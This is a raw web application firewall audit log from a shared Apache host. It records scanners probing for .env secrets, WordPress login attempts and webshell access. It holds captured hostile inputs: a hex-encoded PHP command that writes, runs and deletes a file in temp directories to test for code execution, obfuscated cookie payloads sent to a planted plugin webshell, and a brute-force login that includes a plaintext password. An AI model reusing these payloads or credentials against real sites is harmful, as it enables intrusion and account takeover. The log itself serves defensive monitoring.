Content-Type: text/html; charset=utf-8 --162cf259-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281291230366 55213 (- - -) Stopwatch2: 1751281291230366 55213; combined=2022, p1=427, p2=1353, p3=0, p4=0, p5=241, sr=175, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --162cf259-Z-- --74c71f5a-A-- [30/Jun/2025:16:31:31.616193 +0530] aGJui7pDbab8C7BhY4afLQAAAEw 20.171.207.232 55212 192.168.74.40 443 --74c71f5a-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/js/js/parks-sanctuary.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --74c71f5a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --74c71f5a-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/js/js/parks-sanctuary.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/js/js/parks-sanctuary.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281291599518 16907 (- - -) Stopwatch2: 1751281291599518 16907; combined=4105, p1=141, p2=3815, p3=0, p4=0, p5=149, sr=71, sw=0, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8486296b-Z-- --162cf259-A-- [30/Jun/2025:16:32:30.862244 +0530] aGJuxpukf1DfSpKy1MccugAAAC4 192.253.209.76 25265 192.168.74.40 443 --162cf259-B-- POST /api/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --162cf259-C-- 0x%5B%5D=DTAB --162cf259-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --162cf259-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281350193034 669663 (- - -) Stopwatch2: 1751281350193034 669663; combined=2829, p1=352, p2=2169, p3=0, p4=0, p5=308, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --162cf259-Z-- --56b6612a-A-- [30/Jun/2025:16:32:31.733699 +0530] aGJuxDJ5JKn4EOxWiuppMQAAAFA 104.238.10.81 54003 192.168.74.40 443 --56b6612a-B-- GET /wp-login.php HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203 accept-encoding: gzip, deflate, br cookie: humans_21909=1 Host: thewizblog.com Connection: close --56b6612a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --338a625a-Z-- --23794656-A-- [30/Jun/2025:16:32:42.438771 +0530] aGJu0oeM7ulQx_4iNqO5QQAAADM 192.253.209.62 32121 192.168.74.40 443 --23794656-B-- GET /cp/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --23794656-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --23794656-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281362389886 49289 (- - -) Stopwatch2: 1751281362389886 49289; combined=895, p1=110, p2=573, p3=0, p4=0, p5=212, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --23794656-Z-- --2310d318-A-- [30/Jun/2025:16:32:42.508021 +0530] aGJu0p4tZwI9VhjyFFR7WQAAAEI 20.171.207.232 33346 192.168.74.40 443 --2310d318-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/js/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --2310d318-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2310d318-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/js/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/js/our-services.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281362490113 18197 (- - -) Stopwatch2: 1751281362490113 18197; combined=3444, p1=168, p2=3085, p3=0, p4=0, p5=191, sr=57, sw=0, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --015bc867-Z-- --b1eacc78-A-- [30/Jun/2025:16:32:43.819571 +0530] aGJu04MA06iX30zibMXSRQAAAE4 192.253.209.92 13761 192.168.74.40 443 --b1eacc78-B-- POST /cp/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --b1eacc78-C-- 0x%5B%5D=DTAB --b1eacc78-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --b1eacc78-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281363665709 154481 (- - -) Stopwatch2: 1751281363665709 154481; combined=2625, p1=318, p2=1885, p3=0, p4=0, p5=422, sr=149, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b1eacc78-Z-- --253d1f1a-A-- [30/Jun/2025:16:32:43.924727 +0530] aGJu0NrvUYxMGDqiMsYPHgAAAA0 148.135.148.174 56365 192.168.74.40 443 --253d1f1a-B-- GET /wp-login.php HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203 accept-encoding: gzip, deflate, br cookie: humans_21909=1 Host: thewizblog.com Connection: close --253d1f1a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --392c2d22-Z-- --d149e436-A-- [30/Jun/2025:16:32:45.216245 +0530] aGJu1YMA06iX30zibMXSRgAAAE4 192.253.209.59 9979 192.168.74.40 443 --d149e436-B-- GET /private/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --d149e436-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --d149e436-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281365165025 51597 (- - -) Stopwatch2: 1751281365165025 51597; combined=807, p1=95, p2=526, p3=0, p4=0, p5=186, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d149e436-Z-- --b59cac3b-A-- [30/Jun/2025:16:32:45.412486 +0530] aGJu1drvUYxMGDqiMsYPHwAAAA0 67.205.41.87 46018 192.168.74.40 443 --b59cac3b-B-- POST /wp-content/plugins/elementor/core/common/modules/connect/apps/base.app.php HTTP/1.1 Host: lovedale.us sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="99", "Microsoft Edge";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.30 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip,deflate Accept-Language: eo;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 762 Content-Type: application/x-www-form-urlencoded --b59cac3b-C-- secure_access=706870202d72202724646972733d61727261795f66696c746572285b7379735f6765745f74656d705f64697228292c222f746d70222c222f7661722f746d70222c696e695f676574282275706c6f61645f746d705f64697222292c676574656e76282254454d5022292c676574656e762822544d5022292c67657463776428295d293b24633d72617775726c6465636f646528222533432533467068702532307072696e7425323025323264634158586b4b617a4165504f76762532322e2532324573467050756f666d6c4f4b432532322533426578697425334222293b666f7265616368282464697273206173202464297b69662869735f6469722824642926262069735f7772697461626c6528246429297b24703d227b24647d2f2e72657175657374223b69662866696c655f7075745f636f6e74656e74732824702c246329297b696e636c7564652024703b40756e6c696e6b282470293b657869743b7d7d7d6469652822216e6f74777274626c2122293b27 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --45b0465f-Z-- --11943e1a-A-- [30/Jun/2025:16:32:46.828968 +0530] aGJu1gC_q2cBiBfjIEBnmwAAABY 192.253.209.76 60443 192.168.74.40 443 --11943e1a-B-- POST /private/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --11943e1a-C-- 0x%5B%5D=DTAB --11943e1a-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --11943e1a-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281366784141 44909 (- - -) Stopwatch2: 1751281366784141 44909; combined=1887, p1=206, p2=1279, p3=0, p4=0, p5=401, sr=48, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --11943e1a-Z-- --0458cd4a-A-- [30/Jun/2025:16:32:47.185664 +0530] aGJu154tZwI9VhjyFFR7XQAAAEI 20.171.207.232 33346 192.168.74.40 443 --0458cd4a-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/hotels-jodhpur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --0458cd4a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0458cd4a-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/hotels-jodhpur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --09458b1d-Z-- --d8226d4c-A-- [30/Jun/2025:16:32:47.939378 +0530] aGJu19rvUYxMGDqiMsYPIAAAAA0 192.253.209.97 21919 192.168.74.40 443 --d8226d4c-B-- GET /system/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --d8226d4c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --d8226d4c-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281367896444 43328 (- - -) Stopwatch2: 1751281367896444 43328; combined=1008, p1=97, p2=735, p3=0, p4=0, p5=176, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d8226d4c-Z-- --70524120-A-- [30/Jun/2025:16:32:48.236741 +0530] aGJu04eM7ulQx_4iNqO5QgAAADM 23.95.250.240 57185 192.168.74.40 443 --70524120-B-- POST /wp-login.php HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203 referer: https://thewizblog.com/wp-login.php content-type: application/x-www-form-urlencoded content-length: 144 accept-encoding: gzip, deflate, br cookie: humans_21909=1; wordpress_test_cookie=WP%20Cookie%20check Host: thewizblog.com Connection: close --70524120-C-- log=venessamiller&pwd=Mod%40pk%23pures55&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fthewizblog.com%2Fwp-admin%2F&testcookie=1 --70524120-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9f486558-Z-- --5baf7c79-A-- [30/Jun/2025:16:32:49.578203 +0530] aGJu2StJXhRZGlU1BjiMhQAAAAw 192.253.209.61 57301 192.168.74.40 443 --5baf7c79-B-- POST /system/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --5baf7c79-C-- 0x%5B%5D=DTAB --5baf7c79-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --5baf7c79-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281369435272 143362 (- - -) Stopwatch2: 1751281369435272 143362; combined=2376, p1=121, p2=1960, p3=0, p4=0, p5=295, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5baf7c79-Z-- --0ac08b5a-A-- [30/Jun/2025:16:32:49.736314 +0530] aGJu2YeM7ulQx_4iNqO5QwAAADM 192.250.230.81 38264 192.168.74.40 443 --0ac08b5a-B-- POST /wp-content/plugins/metform/core/integrations/onboard/controls/settings/usergroup_5.php HTTP/1.1 Host: lovedale.us Cookie: 33=AAQAJtrPzG0SEMkLtkVug0RocSzJBiUfNUxBWJcDDoqafWYTRVWpJFZHuRYPaejpPcXzrcAn0DTUiubQGSflNqMhhbCTwkNcioflUOrLcwPSUSNUiHOltrhVNhtesqLqRQOde0WcNwtyyDpiaZIAZDxposSLGXnetIp_TZjGdQKEwfwNLRPMzUSiriDPTINpxlJwBndUnbAe0HDECpeXolsncWENJvBOeIRGKhnThIsAqVrfvJQfsEFUvfNSgJiXvraAtUtgoImaBWvwUqncJhqtNSYB_rDlyRWAOBsMwAQmBFNvakkMmUrWoVvogREtlxNKeJFEmAgeUQ_twBLRBzUHpKTRSamaBgayXUrztVkQtDdstMxBhPh0dwvyajwzkZ0paJOGXJhlsGOCDujZpGtFNOUavZwtrjdlNRStWL_dZnVvCeXBrSRTRInZTkojRZNAdtMttAOKBoeZox1YYjYHdafD30XiZoACRJjw0YUKuUTKjqK0fhtBIoLJm<nZRIamdWu?BnfTiLNLCpaokeFpjDShsfuQijoKJpRoxnVWDEw 0rjJEVRxRI/arhxdEYos_QevNCEIpnqtHhJwHKCHrOhjPIkNyijjFsLqPZymRfiaWDFreoJxsSnlwcIAzqfjQcQEnpufPAuagRJiNbOonqSuxtjwuzNyYiyXZfZVWtlIqAoiWEOejXlCQ0VrtyAiwzQz0KxXUOcrAJY0hpRtbAMGOK0SdJNDrvYuy0QErpJmocpB0RkfpGftIgs0nPXPQVGSDW0gSXhdXPaqM0DoVBFQpNNbrtqwIEriyaZtjRFfgdJsjycRtflJLewBpeSrcoK6NNCwzTwLo4CPDJFKsvz_DLmRfUWMXdANjDyMNFlewZHpUFdEYcDaPRCfWgcomUyWXCVOcdHXSwbzaqGe0bxhdEvqgFQ0qtzdadrSal0mDpAzSHzFj0GZSsyYySgx0TJJMiWDffr0RSOKMSrSTs0YkHimxuVpl0xaZcVOKUIS0ywVRZcMOaE00; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9Vwj/pTujVPVhLzSmMGL0K2EyL29xMFumqUWspz90ZGZbWS9DG1AHJlWEpPWqXFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAioaEyoaDvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj== sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip,deflate Accept-Language: eo;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ee854c7a-Z-- --ebe3d27c-A-- [30/Jun/2025:16:32:51.232793 +0530] aGJu2zSFvs-H_7nBXVD83gAAAEo 192.253.209.83 51577 192.168.74.40 443 --ebe3d27c-B-- GET /redmine/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --ebe3d27c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --ebe3d27c-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281371166639 66415 (- - -) Stopwatch2: 1751281371166639 66415; combined=1527, p1=201, p2=1115, p3=0, p4=0, p5=211, sr=253, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ebe3d27c-Z-- --a9096438-A-- [30/Jun/2025:16:32:51.865265 +0530] aGJu254tZwI9VhjyFFR7YQAAAEI 20.171.207.232 33346 192.168.74.40 443 --a9096438-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/about-us.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --a9096438-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a9096438-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/about-us.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/about-us.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281371846343 19198 (- - -) Stopwatch2: 1751281371846343 19198; combined=4065, p1=162, p2=3708, p3=0, 